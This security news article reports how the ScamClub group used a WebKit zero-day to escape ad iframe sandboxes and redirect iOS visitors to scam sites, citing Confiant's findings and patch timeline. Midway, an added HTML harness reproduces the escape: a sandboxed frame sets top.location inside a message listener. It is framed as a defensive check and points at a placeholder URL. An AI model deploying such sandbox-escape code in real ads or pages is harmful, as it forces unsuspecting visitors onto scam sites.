A zero-day vulnerability in WebKit-based browsers, unpatched at the time, was exploited by a threat group to redirect website visitors to scam sites for at least 8 months, according to a new report released by cybersecurity firm Confiant.
The threat group behind the attack – ScamClub – has been in operation since at least 2018 and primarily uses malicious adverts (malvertising) to direct Internet users to scam sites, often sites running online gift card scams. The malicious adverts are submitted through ad networks and are served to website visitors through ad blocks on legitimate websites. These ad blocks are used on many legitimate websites as a way to increase website revenue.
The gang submits huge numbers of malicious adverts, most of which are identified and rejected by the ad networks, but the high volume of submitted adverts means some of the malicious adverts bypass the ad networks’ security controls and are displayed on websites that use the ad blocks to generate revenue.
The latest campaign has seen the threat group get over 50 million impressions for its malicious adverts over the past 90 days, with low level activity followed by manic bursts of activity, according to Confiant. On some days in the past three months the gang had more than 16 million ad impressions.
The campaign targeted iOS users: the exploited vulnerability is in the WebKit engine, which every browser on iOS uses, including Safari and Chrome for iOS. Most malvertising campaigns require a user to click on one of the adverts in order to be redirected to a malicious website. The zero-day vulnerability allowed the threat group to redirect website visitors with no user interaction at all.
The vulnerability allowed the threat group to escape the iframe sandbox, the `sandbox` attribute that publishers and ad networks set on the `<iframe>` element that holds an advert so that the ad code cannot interact with the surrounding page. A sandboxed frame that is not granted `allow-top-navigation` must not be able to navigate the top-level page, and the weaker `allow-top-navigation-by-user-activation` permits it only in response to a user gesture such as a click on the advert; that is the control that is supposed to keep the ad from redirecting visitors who never clicked. Confiant found that WebKit did not apply these sandbox restrictions to a navigation triggered from inside an event listener for the `message` event. The ad registered such a listener and then had a message posted to the frame; when the listener fired, it set the top-level location to the scam site and the visitor was redirected even though they never clicked on the advert.
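The mechanism described above, as an added check harness that is not Confiant's proof of concept or any code from the original report: the outer page embeds an "ad" in an iframe sandboxed with `allow-scripts` only (no top-navigation permission at all, which is the tightest setting; real ad slots often grant more), the ad-side script assigns `top.location` from inside a `message` listener, and the outer page then posts the trigger message. The destination URL, element ids and message strings are placeholders chosen for this example. On a browser with correct sandbox enforcement the page stays put and reports that the sandbox held; on an affected WebKit build the page is replaced by the placeholder URL.

```html
<!doctype html>
<!-- Added example, not code from Confiant or the original page.
     Outer page = publisher position; the srcdoc iframe = attacker (ad) position.
     https://example.invalid/... is a placeholder that resolves nowhere. -->
<html>
<head><meta charset="utf-8"><title>iframe sandbox top-navigation check</title></head>
<body>
<p id="status">Waiting for the sandboxed frame...</p>

<!-- allow-scripts only: no allow-top-navigation, no allow-top-navigation-by-user-activation,
     so under correct enforcement nothing inside this frame may navigate the top-level page. -->
<iframe id="ad" sandbox="allow-scripts" srcdoc='
  <script>
    // Ad-side code. A direct top.location assignment outside any handler is
    // blocked by the sandbox everywhere; the reported bug was that the same
    // assignment made from inside a "message" event listener was not restricted.
    window.addEventListener("message", function (ev) {
      if (ev.data !== "trigger") return;          // react only to our own trigger
      parent.postMessage("attempting", "*");
      // Browsers block a disallowed navigation silently (console error, no
      // exception), so success is judged by whether the page actually unloads.
      window.top.location = "https://example.invalid/sandbox-escaped";
    });
    parent.postMessage("ready", "*");
  </script>'></iframe>

<script>
  // Outer-page side: wait until the frame has installed its listener, then post
  // the trigger, exactly as a second attacker-controlled frame would in the wild.
  const frame = document.getElementById("ad");
  const status = document.getElementById("status");
  window.addEventListener("message", (ev) => {
    if (ev.source !== frame.contentWindow) return;   // ignore unrelated frames
    if (ev.data === "ready") {
      frame.contentWindow.postMessage("trigger", "*");
    } else if (ev.data === "attempting") {
      status.textContent = "Frame attempted top-level navigation...";
      // If we are still here after a moment, the sandbox was enforced.
      setTimeout(() => {
        status.textContent = "Sandbox held: navigation from the message listener was blocked.";
      }, 2000);
    }
  });
</script>
</body>
</html>
```

Serve the file over HTTP rather than opening it from disk, since some browsers treat `file://` frames specially. The srcdoc frame has an opaque origin (no `allow-same-origin`), so both sides post with a `"*"` target origin and the outer page instead filters on `ev.source`; in a real ad slot the publisher should additionally check `ev.origin` before acting on any message from a frame.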
What made this campaign effective is the sheer volume of ad impressions ScamClub was generating. “Combined with ScamClub’s large volumes and broad targeting that hits dozens of different websites, it’s all about the increased efficacy of spawning a successful redirect — even if we’re talking about a single digit percentage increase, that can mean tens of thousands of impacted impressions over the duration of a single campaign,” said Confiant.
Confiant reported the vulnerability to Apple and Google in June 2020 and a patch was issued to correct the flaw in December 2020. An update has now been made to the Safari browser for macOS and iOS to prevent the vulnerability from being exploited.